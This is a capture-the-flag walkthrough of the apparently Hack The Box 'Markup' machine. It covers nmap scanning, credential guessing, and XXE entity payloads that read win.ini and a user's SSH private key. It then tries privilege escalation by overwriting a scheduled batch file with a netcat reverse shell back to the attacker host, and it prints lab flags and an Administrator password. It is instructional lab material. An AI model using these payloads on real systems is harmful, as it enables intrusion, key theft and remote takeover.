Markup

XML External Entities (XXE or XEE) attacks, which are a type of vulnerability affecting web applications that parse XML input. XXE attacks can lead to various negative consequences, such as disclosure of confidential data or denial of service. The vulnerability exists due to misconfiguration in the XML parser on the server side. Markup is a machine that explores this vulnerability type through a website allowing user input to be parsed as XML.

Key Points:

XML (Extensible Markup Language) is a markup language with a set of rules for encoding documents in a human-readable and machine-readable format.
XML entities are a way of representing data within an XML document, using specific metacharacters instead of the data itself.
XXE attacks exploit a weakly configured XML parser to process XML input containing a reference to an external entity.
Consequences of XXE attacks may include disclosure of confidential data, denial of service, server-side request forgery, port scanning, and other system impacts.
XXE attacks can disclose local files with sensitive data, exploit client-side memory corruption issues, and access local resources that may impact application availability.
Markup is a tool that investigates XXE vulnerabilities through a website that parses user input as XML.

TARGET IP --> 10.129.95.192

HOST TUN0 IP --> 10.10.16.89

Task 1: What version of Apache is running on the target's port 80?

First I'm going to run a quick nmap scan on the target to see all the ports that are open.

nmap [Target IP]

Ports 22, 80, and 443 are open. Next, I'll run a more detailed nmap scan on just those ports.

nmap -sV -sC -p 22,80,443 [Target IP]

Version 2.4.41 of Apache is being run. I can also try to verify this with Wappalyzer by visiting the page on a browser.

Lots of other good information here as well such as the back-end programming language and the OS.

Task 2: What username:password combination logs in successfully?

I started by checking out the source code of both the port 80 and 443 pages. Nothing to note on either.
I then tried capturing a packet being sent on the http page while using the credentials of admin:admin with burp.

I sent it to the repeater to try a few guesses.
After a few guesses, I got the credentials admin:password to work.

Task 3: What is the word at the top of the page that accepts user input?

Looking at the home page, I can see that the tab called Order takes me to a page that accepts user input.

Task 4: What XML version is used on the target?

I started by first looking at the source code to the page which includes some JS for the function getXml. This includes a reference to XML Version 1.0

I also tried to capture a packet being sent out with Burp.

Looks like it is running XML version 1.0

Task 5: What does the XXE / XEE attack acronym stand for?

The acronym stands for XML External Entity

Task 6: What username can we find on the webpage's HTML code?

I checked the source code for the order page before and at the top in the comments, it shows a name of Daniel.

Task 7: What is the file located in the Log-Management folder on the target?

I first tried exploring HackTricks to see what examples there are for XEE attacking.
I grabbed a script and tried inputting it into the request through the Burp Repeater.

<!DOCTYPE foo [<!ENTITY example SYSTEM "C:\windows\system32\drivers\etc\hosts"> ]>

Unfortunately, I'm not sure what I got back.
Next, I tried a different example.

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>

It looks like I had to add one of the elements into the item field as &test;

Now I will try that again for the previous link to see if that works.

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///C:\windows\system32\drivers\etc\hosts'>]>

Unfortunately, it doesn't look like that directory exists.
Since we know there is the possibility that a user named Daniel exists, let's check the user's .ssh folder for possible SSH private keys. I need to keep this folder's route in mind for future exploitation.

<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///C:/users/daniel/.ssh/id_rsa'>]>

It looks like the file directory exists with a private RSA key to the user Daniel.

Since we have the private key, let's see if we can SSH into Daniel's account with it.
First start by saving the private key to a file on your host machine called id_rsa.pem using nano.

ssh -i id_rsa.pem daniel@[Target IP]

Unfortunately, this doesn't look like it worked. Check below for how to make it work by changing permissions.

Trying again, I need to change the permissions so that the key is accepted by SSH.

chmod 400 id_rsa.pem

I now have access to the system through Daniel's account.

If I redirect to the C:\Log-Management directory, I will find a file named job.bat.

dir C:\Log-Management

Task 8: What executable is mentioned in the file mentioned before?

Let's take a look at that job.bat file.

type C:\Log-Management\job.bat

There is an executable called wevtutil.exe in the bat file.
This bat file clears all event logs on a Windows computer, but it first checks if the script is being run with administrator privileges.
The wevtutil.exe tool is used to manage and manipulate Windows event logs from the command line.

Submit User Flag:

Once logged in on Daniel's account, redirect to C:\Users\daniel\Desktop\user.txt to see the flag.

type C:\Users\daniel\Desktop\user.txt

032d2fc8952a8c24e39c8f0ee9918ef7

Submit Root Flag

Since we are currently logged in as Daniel, let's first start by seeing what privileges we have.

whoami /priv

Apparently, none of these privileges are exactly unique so let's explore the system to see what else we can do.
Let's go back to the job.bat file that we had access to. It shows that only the administrator can run it but let's see if Daniel is part of any groups that have editing privileges.

icacls job.bat

Daniel is part of the BUILTIN\Users group which shows full control (F).
Let's attempt to modify the script.
First though, let's check to see if the wevtutil tool is running by using schtasks command.

schtasks

If this doesn't work due to permissions, we can use the powershell to execute the command due to improper security configurations.

powershell

Then run the ps command to see what processes are running while in powershell.

ps

Looks like it is running with the ID 4648.
Next, we will look into using netcat to gain a foothold.
Let's start by downloading nc64.exe. Do this on your host system since the target system won't allow for an internet connection. It allows me to do it because I am on the same network as the machine.

wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe

Then let's start a python web server from the directory that you saved the nc64.exe to.

sudo python3 -m http.server 80

Let's now download the nc listener from the web server to the target machine using wget.

wget http://[HOST IP]/nc64.exe -outfile nc64.exe

Let's start up a netcat listener on our host machine.

nc -lvnp 4444

Next is to exit out of the Powershell window and back to CLI for Daniel.

exit

Next we will modify the job.bat file to include the netcat listener with the following command.

echo C:\Log-Management\nc64.exe -e cmd.exe [HOST IP] [Netcat Listening PORT] > C:\Log-Management\job.bat

It's a good chance this will not work. I tried multiple times but was not able to get a reverse connection to the administrator account.
If you do get access to the administrator account, quickly navigate to the root flag using the following:

type C:\Users\Administrator\Desktop\root.txt

The root flag is --> f574a3e7650cebd8c39784299cb570f8

WinPEAS

We could also have run WinPEAS on the system to auto enumerate the machine to look for vulnerabilities. If we did that, we would have found auto-login credentials for the Admin.

Administrator:Yhk}QE&j<3M
We could then use this to SSH into the system and get the flag.

PreviousIncluded NextBase

Last updated 1 year ago